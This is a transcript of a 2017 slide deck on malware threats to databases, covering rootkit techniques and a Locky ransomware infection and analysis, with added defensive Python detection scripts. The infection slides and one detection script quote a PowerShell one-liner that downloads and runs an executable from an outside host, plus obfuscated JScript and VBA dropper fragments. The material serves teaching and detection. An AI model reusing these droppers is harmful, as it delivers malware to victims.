MALWARES ON WINDOWS AND LINUX: THE WORST THREAT FOR DATABASES

Transcript of the slide deck (79 slides).

Page 1:

ALEXANDRE BORGES – IT IS NOT ALLOWED TO COPY NEITHER REPRODUCE THIS SLIDE.


GUOB TECH DAY 2017 – LA OTN TOUR (INTRODUCTORY LECTURE FOR DBAs)

By Alexandre Borges

MALWARES ON WINDOWS AND LINUX: THE WORST THREAT FOR DATABASES

Page 2: PROFILE AND TOC

TOC:

• Introduction
• Infection
• Test Environment
• Memory Analysis
• Quick Dynamic and Static Analysis
• Last words

Profile:

• Malware and Security Researcher.
• Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics, Rootkits and Software Exploitation.
• Instructor at Oracle, (ISC)2 and EC-Council. Ex-instructor at Symantec.
• Member of the CHFI Advisory Board in EC-Council.
• Reviewer member of The Journal of Digital Forensics, Security and Law.
• Referee on Digital Investigation: The International Journal of Digital Forensics & Incident Response.
• Author of the book “Oracle Solaris Advanced Administration”.


Page 3: WARNING !!!

• Please pay attention to the following considerations:
• It is NOT ALLOWED to take pictures of the slides.
• It is NOT ALLOWED to record the lecture.
• It is NOT ALLOWED to film the lecture.
• Please respect the speaker and his material.

HTTP://ALEXANDREBORGES.ORG 3


Page 4: INTRODUCTION

Page 5: INTRODUCTION

• FACT: Malware is destroying the digital world.
• Several types of malware:
  • Ring 3 (ransomware included)
  • Ring 0 (kernel malware and bootkits)
  • Ring -1 (VMM)
  • Ring -2 (SMM)
  • Ring -3 ? (Intel Management Engine)
• The number of malware samples infecting BIOS / UEFI has been increasing.
• Malware running on GPU

Page 6: INTRODUCTION

• Malware uses several tricks to make detection harder than usual:
  • Process hiding (DKOM)
  • Process replacement (hollowing)
  • DLL hiding (by manipulating _LDR_DATA_TABLE_ENTRY)
  • Service hiding + service hijacking
  • Hidden sockets
  • Code injection (multiple methods)
  • Hooking (code, IAT, EAT)
  • Binary hidden in the Registry

Page 7: INTRODUCTION

[Figure: the kernel process list drawn as a circular doubly linked list of three entries, 101, 102 and 103, each with its flink and blink pointers; the traversal runs 101 → 102 → 103 along flink and 103 → 102 → 101 along blink.]

DKOM (Direct Kernel Object Manipulation) on the processes list.
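As an added illustration (not code from the deck), a Python model of the DKOM trick in the figure and the cross-view check that catches it: nodes 101, 102 and 103 are linked as drawn, 102 is unlinked, and a list walk is compared against an inventory of every object still allocated. All structures here are constructed for the example.

```python
"""Cross-view detection of a process hidden by DKOM (constructed model)."""


class Process:
    """Minimal stand-in for an EPROCESS: a pid plus the flink/blink pair."""

    def __init__(self, pid):
        self.pid = pid
        self.flink = self   # ActiveProcessLinks.Flink
        self.blink = self   # ActiveProcessLinks.Blink


def build_list(pids):
    """Link the processes into a circular doubly linked list; returns the head."""
    head = Process(pids[0])
    prev = head
    for pid in pids[1:]:
        node = Process(pid)
        prev.flink = node
        node.blink = prev
        prev = node
    prev.flink = head
    head.blink = prev
    return head


def dkom_unlink(node):
    """What DKOM does: the neighbours point past the node. The object itself
    stays allocated and its threads keep being scheduled, so only the list
    walk loses sight of it."""
    node.blink.flink = node.flink
    node.flink.blink = node.blink
    # Rootkits commonly point the victim's own links at itself so that a later
    # unlink on process exit does not corrupt the list.
    node.flink = node
    node.blink = node


def walk_list(head):
    """The 'pslist' view: follow flink from the head until it wraps around."""
    seen = []
    node = head
    while True:
        seen.append(node.pid)
        node = node.flink
        if node is head:
            return seen


def scan_objects(allocated):
    """The 'psscan' view: every process object still present in memory,
    linked or not. In a memory image this comes from pool-tag scanning; here
    the pool is just a Python list."""
    return sorted(p.pid for p in allocated)


def cross_view(head, allocated):
    """Pids present in the scan view but missing from the list walk."""
    return sorted(set(scan_objects(allocated)) - set(walk_list(head)))


def demo():
    """Build 101 -> 102 -> 103, hide 102, return (list walk, hidden pids)."""
    head = build_list([101, 102, 103])
    # Inventory of every allocated object, taken before the rootkit acts.
    allocated = [head, head.flink, head.flink.flink]
    dkom_unlink(head.flink)          # hide pid 102
    return walk_list(head), cross_view(head, allocated)


if __name__ == "__main__":
    visible, hidden = demo()
    print("list walk sees:", visible)
    print("hidden by DKOM:", hidden)
```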

Page 8: INTRODUCTION

Basic Function Hooking

Caller:
    .....
    push param3
    push param2
    push param1
    call good_function      ; the caller still believes it calls the original
    mov ebx, eax
    ....

good_function (hooked):
    push ebp
    mov ebp, esp
    ...good things...
    call bad_function       ; the hook: a detour into the attacker's code
    ....
    ret

bad_function:
    push ebp
    mov ebp, esp
    ...bad things...
    ret

Page 9: INTRODUCTION

Hooking

• NtClose function (from ntdll.dll) being hooked:

    0x7c90cfd0 b819000000  MOV EAX, 0x19
    0x7c90cfd5 ba5000907c  MOV EDX, 0x7c900050
    0x7c90cfda ffd2        CALL EDX
    0x7c90cfdc c20400      RET 0x4
    0x7c90cfdf 90          NOP
    0x7c90cfe0 b81a000000  MOV EAX, 0x1a
    0x7c90cfe5 ba          DB 0xba
    0x7c90cfe6 0003        ADD [EBX], AL

Page 10: INTRODUCTION

Hooking

    0x7c900050 b203              MOV DL, 0x3
    0x7c900052 eb08              JMP 0x7c90005c
    0x7c900054 b204              MOV DL, 0x4
    0x7c900056 eb04              JMP 0x7c90005c
    0x7c900058 b205              MOV DL, 0x5
    0x7c90005a eb00              JMP 0x7c90005c
    0x7c90005c 52                PUSH EDX
    0x7c90005d e804000000        CALL 0x7c900066
    0x7c900062 f20094005aff2269  ADD [EAX+EAX+0x6922ff5a], DL
    0x7c90006a 6e                OUTS DX, BYTE [ESI]
    .....

Anti-disassembly trick.
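An added example, not from the deck, that checks a stub such as the hooked NtClose above for the expected MOV EAX / MOV EDX / CALL EDX shape and flags an EDX target other than the shared system-call stub. It assumes the Windows XP convention in which the clean stub loads EDX with 0x7ffe0300, and an ntdll range of 0x7c900000 to 0x7c9b0000; both values are assumptions of the example, not taken from the slides.

```python
"""Inline-hook check for an XP-style ntdll system-call stub."""

import struct

# Assumed clean CALL EDX target: the SharedUserData system-call stub (XP era).
SYSCALL_STUB = 0x7FFE0300
# Assumed ntdll image range for the demo.
NTDLL_BASE, NTDLL_END = 0x7C900000, 0x7C9B0000

# Bytes of the hooked NtClose from the slide, starting at 0x7c90cfd0:
# MOV EAX,0x19 / MOV EDX,0x7c900050 / CALL EDX / RET 4 / NOP
HOOKED = bytes.fromhex("b819000000ba5000907cffd2c2040090")
# Constructed clean stub: same syscall number, EDX -> SharedUserData stub.
CLEAN = bytes.fromhex("b819000000ba0003fe7fffd2c2040090")


def parse_stub(code):
    """Decode the fixed-shape stub B8 imm32 / BA imm32 / FF D2 / C2 imm16.
    Returns (syscall_number, edx_target), or None if the shape is gone."""
    if len(code) < 15 or code[0] != 0xB8 or code[5] != 0xBA:
        return None
    if code[10:12] != b"\xff\xd2" or code[12] != 0xC2:
        return None
    syscall = struct.unpack_from("<I", code, 1)[0]
    target = struct.unpack_from("<I", code, 6)[0]
    return syscall, target


def classify(code, module_base=NTDLL_BASE, module_end=NTDLL_END):
    """Return (verdict, edx_target).
    clean                 - EDX goes to the shared system-call stub
    hooked-inside-module  - EDX stays inside the module image (the slide's
                            trampoline sits in ntdll's own header slack)
    hooked-outside-module - EDX points at some other allocation
    unexpected            - the stub no longer has the expected shape"""
    parsed = parse_stub(code)
    if parsed is None:
        return "unexpected", None
    _, target = parsed
    if target == SYSCALL_STUB:
        return "clean", target
    inside = module_base <= target < module_end
    return ("hooked-inside-module" if inside else "hooked-outside-module"), target


if __name__ == "__main__":
    for label, stub in (("hooked", HOOKED), ("clean", CLEAN)):
        verdict, target = classify(stub)
        print(f"{label}: {verdict} (EDX -> 0x{target:08x})")
```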

Page 11: INTRODUCTION

• And what about injection techniques? There are many methods:
  • Remote DLL Injection: it is easily detected because the DLL must be on disk before being injected.
  • PE Injection: a PE file, which has its IAT configured for the target process, is written into the address space of the target process and forced to execute there.
  • Reflective Injection: it is similar to the previous one, but the code (usually a DLL) manages its own initialization.
  • APC Injection: malicious code is executed by attaching it to an APC (Asynchronous Procedure Call) of the target thread.

Page 12: INTRODUCTION

• Other tricks:
  • Hooking SSDT
  • Hooking IDT
  • Orphan threads
  • IRP hooking
  • Hiding kernel drivers
  • Bypassing KCS (Kernel Code Signing)
  • Callbacks
  • Filter drivers

Page 13: INTRODUCTION

• The analysis can be difficult because there are several anti-analysis techniques:
  • Anti-debugging
  • Anti-disassembly
  • Anti-VMware
  • Packers (common and virtualized ones)
  • Obfuscation
  • .NET tricks
  • PowerShell + WMI

Page 14: INTRODUCTION

• There are many threats infecting firmware, and they are persistent and stealthy.
• They can replace the OS boot loader, patch the kernel, and so on...
  • Petya (MBR ransomware)
  • Mebromi (BIOS rootkit)
  • Gapz (BIOS parameter block modification)
  • TDL4

Page 15: INTRODUCTION

https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf

Page 16: INTRODUCTION

• http://privacy-pc.com/articles/ransomware-chronicle.html

Page 17: INTRODUCTION - KASPERSKY OVERALL STATISTICS FOR 2016

https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_2016_Statistics_ENG.pdf


Page 18: INTRODUCTION - KASPERSKY OVERALL STATISTICS FOR 2016

https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_2016_Statistics_ENG.pdf


Page 19: INTRODUCTION - SYMANTEC INTERNET SECURITY THREAT REPORT 2016

https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf


Huh? Are you sure that Linux systems are safe against malware?

Page 20: INFECTION

Page 21: INFECTION

• Malware has three main goals when it infects a system:
  • Owning the system to use it in future attacks
  • Stealing data
  • Hijacking data (ransomware)
• We know the main infection techniques:
  • E-mail
  • USB
  • Network sharing
  • Exploiting vulnerabilities (remember WannaCry)

Page 22: INFECTION

Click to die

Page 23: INFECTION

Obfuscated code. However, it is trivial to solve it.

Page 24: INFECTION

Obfuscated code. Again, it is trivial to solve it.

Page 25: INFECTION

    function nomusta(prototu){return prototu.replace(/AA/g,"");}
    var fuka = new ActiveXObject(nomusta("MSXAAML2.XMLHTAATP"));
    fuka.open(jacob[3-2], ""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);

• XMLHttpRequest object
  • Represents an XML request using HTTP.
  • It has an open method that requests a synchronous or asynchronous file download from a specific URL.

Page 26: INFECTION

• The XMLHttpRequest object also has a send method, which sends an HTTP request to the server and receives a response.

    function zulum(pikue) {pikue.send( );}
    zulum(fuka);
    function hust(gulibator){eval(gulibator);}
    hust(gusar);
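An added example (not the deck's code) of the static side of that deobfuscation: it locates replace()-based helper functions such as nomusta and rewrites every call with a literal argument to its decoded string, so the MSXML2.XMLHTTP indicator becomes visible without executing anything. The sample below is a constructed excerpt that mirrors the slides' fragment.

```python
"""Static resolution of replace()-based string obfuscation in JScript droppers."""

import re

# Constructed sample mirroring the fragment on the slides (never executed).
SAMPLE = r'''
function nomusta(prototu){return prototu.replace(/AA/g,"");}
var fuka = new ActiveXObject(nomusta("MSXAAML2.XMLHTAATP"));
fuka.open(jacob[3-2], ""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
function zulum(pikue) {pikue.send( );}
zulum(fuka);
function hust(gulibator){eval(gulibator);}
hust(gusar);
'''

# Matches: function NAME(ARG){return ARG.replace(/PATTERN/g,"REPL");}
HELPER_RE = re.compile(
    r'function\s+(\w+)\s*\(\s*(\w+)\s*\)\s*\{\s*return\s+\2\.replace\('
    r'/([^/]+)/g\s*,\s*"([^"]*)"\s*\)\s*;?\s*\}')

# Indicators worth reporting once the literals are readable.
INDICATORS = ("ActiveXObject", "MSXML2.XMLHTTP", ".open(", ".send(", "eval(")


def _call_re(name):
    """Regex for NAME("literal") or NAME('literal') call sites."""
    return re.compile(r'\b' + re.escape(name) + r'\(\s*(["\'])(.*?)\1\s*\)')


def find_helpers(js):
    """Map helper name -> (regex pattern, replacement) for each replace() helper."""
    return {m.group(1): (m.group(3), m.group(4)) for m in HELPER_RE.finditer(js)}


def decode_literal(literal, pattern, repl):
    """Apply the helper's transform statically: JS /PATTERN/g is re.sub here."""
    return re.sub(pattern, lambda _m: repl, literal)


def resolve_calls(js):
    """Rewrite every helper("literal") call into its decoded string literal."""
    out = js
    for name, (pattern, repl) in find_helpers(js).items():
        out = _call_re(name).sub(
            lambda m, p=pattern, r=repl: '"' + decode_literal(m.group(2), p, r) + '"',
            out)
    return out


def indicators(js):
    """Indicators present after the literals have been resolved."""
    resolved = resolve_calls(js)
    return [tok for tok in INDICATORS if tok in resolved]


if __name__ == "__main__":
    print(resolve_calls(SAMPLE))
    print("indicators:", indicators(SAMPLE))
```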

Page 27: INFECTION

Click to die

Page 28: INFECTION

Probably, the malware’s author wants to execute something bad on your system.

Page 29: INFECTION

    Sub Document_Open( )
        urgixbe = "gwefakqyrb"
        If (odbumuwgi = 811) Then
            If (osduzu = "icdyclaw") Then
                ….
                hnevo = Shell(ibovuhl, unymk)
                niwwyshomq = Empty
                tnovgistoqme = "58732" & 18
                sgukkezihh = "46106" & 81
                ...

Again, obfuscated code. Once more, it is very simple to bypass it.

Page 30: INFECTION

    "CMD.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -nOprOfiLE -WIndowstYlE HIDDen (new-ObJECT SYStem.nET.WeBcLIent).downLOAdFilE('http://unityiestgen.top/search.php','%appdaTA%.ExE');start-prOceSS '%AppDatA%.Exe'""

I have not shown the deobfuscation process because it is really simple.
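An added detection example (not the deck's code) for the launcher above: it case-folds process-creation command lines, which defeats the random capitalisation, and scores the flags the slide's command combines. The log records and the score weights are constructed for the example.

```python
"""Scoring obfuscated PowerShell launchers from process-creation command lines."""

import re

# Constructed process-creation records; the first mirrors the slide's command.
LOG = [
    r'''cmd.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -nOprOfiLE -WIndowstYlE HIDDen (new-ObJECT SYStem.nET.WeBcLIent).downLOAdFilE('http://unityiestgen.top/search.php','%appdaTA%.ExE');start-prOceSS '%AppDatA%.Exe'"''',
    r'''powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"''',
    r'''powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1''',
]

# (weight, description, regex over the normalised command line). PowerShell
# accepts unambiguous switch prefixes, so the common short forms are included.
RULES = [
    (2, "execution policy bypass", re.compile(r"-(ep|exec|executionpolicy)\s+bypass")),
    (2, "hidden window",           re.compile(r"-(w|win|windowstyle)\s+hidden")),
    (1, "no profile",              re.compile(r"-nop(rofile)?\b")),
    (3, "webclient download",      re.compile(r"net\.webclient\)\s*\.download(file|string)\(")),
    (2, "payload in %appdata%",    re.compile(r"%appdata%")),
    (2, "start-process of payload", re.compile(r"start-process\s+'?%appdata%")),
]
THRESHOLD = 5   # constructed: any two of the heavier rules together alert


def normalize(cmdline):
    """Case-fold and collapse whitespace so capitalisation and padding are irrelevant."""
    return re.sub(r"\s+", " ", cmdline.lower())


def score(cmdline):
    """Return (total score, list of matched rule descriptions)."""
    norm = normalize(cmdline)
    matched = [(weight, desc) for weight, desc, rx in RULES if rx.search(norm)]
    return sum(w for w, _ in matched), [d for _, d in matched]


def extract_urls(cmdline):
    """Pull out http(s) URLs for triage, from the normalised form."""
    return re.findall(r"https?://[^\s'\"]+", normalize(cmdline))


def suspicious(log_lines, threshold=THRESHOLD):
    """Return [(line index, score, hits, urls)] for PowerShell launches at or
    above the threshold; non-PowerShell lines are skipped."""
    flagged = []
    for i, line in enumerate(log_lines):
        if "powershell" not in line.lower():
            continue
        total, hits = score(line)
        if total >= threshold:
            flagged.append((i, total, hits, extract_urls(line)))
    return flagged


if __name__ == "__main__":
    for idx, total, hits, urls in suspicious(LOG):
        print(f"line {idx}: score {total}, {hits}, urls={urls}")
```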

Page 31: TEST ENVIRONMENT

Page 32: TEST ENVIRONMENT

[Figure: test lab. Two Windows 8 x64 machines behind NAT with Internet access: one with Oracle Database 12.2 installed, the other with Oracle Instant Client 12.2 installed.]

Page 33: TEST ENVIRONMENT

• LISTENER.ORA

Page 34: TEST ENVIRONMENT

• TNSNAMES.ORA

Page 35: TEST ENVIRONMENT

    C:\instantclient_12_2> sqlplus system@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=win81.example.com)(Port=1521))(CONNECT_DATA=(SID=orcl)))
    Enter password: Malware123!

    Connected to:
    Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

    SQL> select instance_name from v$instance;

    INSTANCE_NAME
    ------------------------------------------------
    orcl

Page 36: TEST ENVIRONMENT

Page 37: TEST ENVIRONMENT

Infected with Locky (version JUL/30/2017)

Page 38: TEST ENVIRONMENT

Page 39: TEST ENVIRONMENT

Page 40: TEST ENVIRONMENT

Page 41: TEST ENVIRONMENT

Encrypted database files. On Windows, you are lucky because it prevents two processes from altering the same file at the same time. On Linux... no luck.

Page 42: TEST ENVIRONMENT

Photo from Twitter of my colleague Valerie Thomas (@hacktress09)

After the Oracle database has been encrypted by the ransomware....

Page 43: MEMORY ANALYSIS

Page 44: MEMORY ANALYSIS

Probably, the ransomware is destroying snapshots.

Page 45: MEMORY ANALYSIS

Running as administrator

Page 46: MEMORY ANALYSIS

DLLs that are responsible for accessing the network/Internet ;)

32-bit code running on x64. Of course.

Page 47: MEMORY ANALYSIS

Class Identifier registry. Is COM present?

Interesting Registry entries.

Page 48: MEMORY ANALYSIS

A few URLs in memory.

Page 49: MEMORY ANALYSIS

Locky ransomware connecting to C2 (Command and Control Server).

Page 50: MEMORY ANALYSIS

Russia... again?

Page 51: MEMORY ANALYSIS

VAD Short and RWE. Code injection, of course. (VAD == Virtual Address Descriptor)

Page 52: MEMORY ANALYSIS

Three injected code regions saved to disk. Pay attention: three different hashes.
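An added example (not from the deck) of the malfind-style check behind these two slides: it selects private VAD regions that are both writable and executable, notes whether a PE header is present, and hashes each dumped region, which is why three injected regions yield three different hashes. The VAD table and region contents are constructed; a real tool reads them from the memory image.

```python
"""Flagging RWX private memory from a VAD table and hashing the dumps."""

import hashlib
from dataclasses import dataclass

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80


@dataclass
class Vad:
    start: int
    end: int
    protection: int
    private: bool        # True: no backing file (the "VAD Short" / VadS case)
    tag: str
    content: bytes       # region bytes as they would be read from the image


def is_suspicious(vad):
    """Private memory that is writable and executable is the classic
    injection footprint; image-backed mappings are how real DLLs look."""
    rwx = vad.protection in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)
    return vad.private and rwx


def looks_like_pe(data):
    """Injected DLL/EXE images keep their 'MZ' header; bare shellcode does not."""
    return data[:2] == b"MZ"


def dump_and_hash(vads):
    """Return [(start, end, has_pe_header, sha256)] for every suspicious VAD."""
    out = []
    for vad in vads:
        if is_suspicious(vad):
            digest = hashlib.sha256(vad.content).hexdigest()
            out.append((vad.start, vad.end, looks_like_pe(vad.content), digest))
    return out


def distinct_hashes(vads):
    """Number of unique payloads among the suspicious regions."""
    return len({h for _, _, _, h in dump_and_hash(vads)})


def _region(seed, size=0x1000, pe=True):
    """Constructed region body: an 'MZ' header (or not) followed by filler
    derived from the seed, so every region is distinct."""
    body = hashlib.sha256(seed.encode()).digest() * (size // 32)
    return (b"MZ" + body[2:]) if pe else body


# Constructed VAD table modelled on the slides: three injected regions plus
# an image mapping, a heap and ntdll.
VADS = [
    Vad(0x00400000, 0x00431FFF, PAGE_EXECUTE_WRITECOPY, False, "Vad ", _region("image")),
    Vad(0x00180000, 0x00180FFF, PAGE_EXECUTE_READWRITE, True, "VadS", _region("inj1")),
    Vad(0x00390000, 0x00390FFF, PAGE_EXECUTE_READWRITE, True, "VadS", _region("inj2")),
    Vad(0x021A0000, 0x021A0FFF, PAGE_EXECUTE_READWRITE, True, "VadS", _region("inj3", pe=False)),
    Vad(0x00500000, 0x005FFFFF, PAGE_READWRITE, True, "VadS", _region("heap", pe=False)),
    Vad(0x7C900000, 0x7C9AFFFF, PAGE_EXECUTE_WRITECOPY, False, "Vad ", _region("ntdll")),
]

if __name__ == "__main__":
    for start, end, has_pe, digest in dump_and_hash(VADS):
        print(f"0x{start:08x}-0x{end:08x} pe={has_pe} sha256={digest}")
```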

Page 53: MEMORY ANALYSIS

Interesting string references and DLLs.

Page 54: MEMORY ANALYSIS

It is a hook, but this specific one is not important right now.

Page 55: QUICK STATIC AND DYNAMIC ANALYSIS

Page 56: QUICK STATIC AND DYNAMIC ANALYSIS

It seems that our malware is the Locky ransomware, isn’t it?

Page 57: QUICK STATIC AND DYNAMIC ANALYSIS

Take a look at the entropy.

Boring to reverse.

Page 58: QUICK STATIC AND DYNAMIC ANALYSIS

High entropy.

Page 59: QUICK STATIC AND DYNAMIC ANALYSIS

Encrypted overlay.
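An added example (not the deck's code) that measures what these three slides show: per-section Shannon entropy read from the PE section table, and the size and entropy of any overlay past the last section. It constructs a minimal PE32 for the demonstration rather than reading a sample from disk.

```python
"""Per-section entropy and overlay detection for a PE file."""

import math
import random
import struct


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Return [(name, raw_offset, raw_size)] from the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # IMAGE_FILE_HEADER follows the signature: NumberOfSections at +2,
    # SizeOfOptionalHeader at +16 within it.
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(n_sections):
        off = table + i * 40                       # sizeof(IMAGE_SECTION_HEADER)
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        sections.append((name, raw_ptr, raw_size))
    return sections


def analyze(pe, threshold=7.0):
    """Return ([(name, entropy, packed?)], overlay length, overlay entropy).
    Sections at or above the threshold are the high-entropy ones; bytes past
    the last section's raw end are the overlay."""
    report, end_of_data = [], 0
    for name, ptr, size in parse_sections(pe):
        ent = shannon_entropy(pe[ptr:ptr + size])
        report.append((name, round(ent, 2), ent >= threshold))
        end_of_data = max(end_of_data, ptr + size)
    overlay = pe[end_of_data:]
    return report, len(overlay), round(shannon_entropy(overlay), 2)


def _section_header(name, vsize, va, rsize, rptr):
    """IMAGE_SECTION_HEADER (40 bytes) with code|execute|read characteristics."""
    return struct.pack("<8sIIIIIIHHI", name, vsize, va, rsize, rptr,
                       0, 0, 0, 0, 0x60000020)


def build_sample_pe():
    """Constructed minimal PE32: a low-entropy .text, a high-entropy .packed
    section and 0x300 bytes of random overlay appended after the sections."""
    rng = random.Random(7)                         # deterministic sample data
    e_lfanew, opt_size = 0x40, 0xE0                # PE32 optional header size
    text_ptr, packed_ptr = 0x200, 0x400
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    table = (_section_header(b".text", 0x200, 0x1000, 0x200, text_ptr)
             + _section_header(b".packed", 0x800, 0x2000, 0x800, packed_ptr))
    headers = dos + b"PE\0\0" + file_hdr + opt_hdr + table
    headers += b"\0" * (text_ptr - len(headers))
    text = b"\x90" * 0x1F0 + b"\xC3" * 0x10                    # NOPs and RETs
    packed = bytes(rng.getrandbits(8) for _ in range(0x800))   # looks encrypted
    overlay = bytes(rng.getrandbits(8) for _ in range(0x300))
    return headers + text + packed + overlay


if __name__ == "__main__":
    print(analyze(build_sample_pe()))
```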

Page 60: QUICK STATIC AND DYNAMIC ANALYSIS

MFC (Microsoft Foundation Class): a collection of C++ classes commonly used in object-oriented programming. Usually, MFC can be thought of as a wrapper around the Windows API (playing a “proxy” role).

No import names.

Page 61: QUICK STATIC AND DYNAMIC ANALYSIS

IDA Pro shows us all function names inside MFC42.dll, but the reversing analysis is very boring.

Page 62: QUICK STATIC AND DYNAMIC ANALYSIS

There is no crypto function.

Page 63: QUICK STATIC AND DYNAMIC ANALYSIS

Classic unpacking process, loading DLLs one by one.

Page 64: QUICK STATIC AND DYNAMIC ANALYSIS

These new segments are coming from VirtualAlloc( ) calls. Eventually, one of them could be the unpacked executable that we are looking for.

Page 65: QUICK STATIC AND DYNAMIC ANALYSIS

They are good signs. Therefore, we can save this dump to disk.

Page 66: QUICK STATIC AND DYNAMIC ANALYSIS

The crypto functions have arisen!

Page 67: QUICK STATIC AND DYNAMIC ANALYSIS

At this point your life changes (desperately looking for a backup).

Page 68: QUICK STATIC AND DYNAMIC ANALYSIS

from CryptImportKey( )

from CryptCreateHash( )

Page 69: QUICK STATIC AND DYNAMIC ANALYSIS

Page 70: QUICK STATIC AND DYNAMIC ANALYSIS

Page 71: QUICK STATIC AND DYNAMIC ANALYSIS

    // Pseudocode of the encryption loop: one IV is set on the original key,
    // then each block is encrypted with a fresh duplicate of that key, so the
    // original key's state (including the IV just set) is never advanced by
    // CryptEncrypt.
    CryptSetKeyParam(hOriginalKey, AB_IV, new_IV)
    while (block = NextBlockEncoding())
    {
        hDuplicateKey = CryptDuplicateKey(hOriginalKey)
        CryptEncrypt(hDuplicateKey, block)
        CryptDestroyKey(hDuplicateKey)
    }

Page 72: QUICK STATIC AND DYNAMIC ANALYSIS

Usual place to set up the persistence.

Page 73: QUICK STATIC AND DYNAMIC ANALYSIS

Looking for all file extensions in order to encrypt their respective files, and this data reference is the list of all of them!

Page 74: QUICK STATIC AND DYNAMIC ANALYSIS

A few of the extensions that the ransomware looks for and, among them, .dbf (from Oracle databases).

Page 75: QUICK STATIC AND DYNAMIC ANALYSIS

Connect to the author’s server using username and password.

Page 76: QUICK STATIC AND DYNAMIC ANALYSIS

We could use Wireshark, couldn’t we?

Page 77: REMEMBER

We are always in CONTROL...

Page 78:

Page 79: THANK YOU FOR ATTENDING MY LECTURE!

LinkedIn: http://www.linkedin.com/in/aleborges
Twitter: @ale_sp_brazil
Blog: http://alexandreborges.org
E-mail: [email protected]

• Malware and Security Researcher.
• Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics, Rootkits and Software Exploitation.
• Instructor at Oracle, (ISC)2 and EC-Council. Ex-instructor at Symantec.
• Member of the CHFI Advisory Board in EC-Council.
• Reviewer member of The Journal of Digital Forensics, Security and Law.
• Referee on Digital Investigation: The International Journal of Digital Forensics & Incident Response.
• Author of the book “Oracle Solaris Advanced Administration”.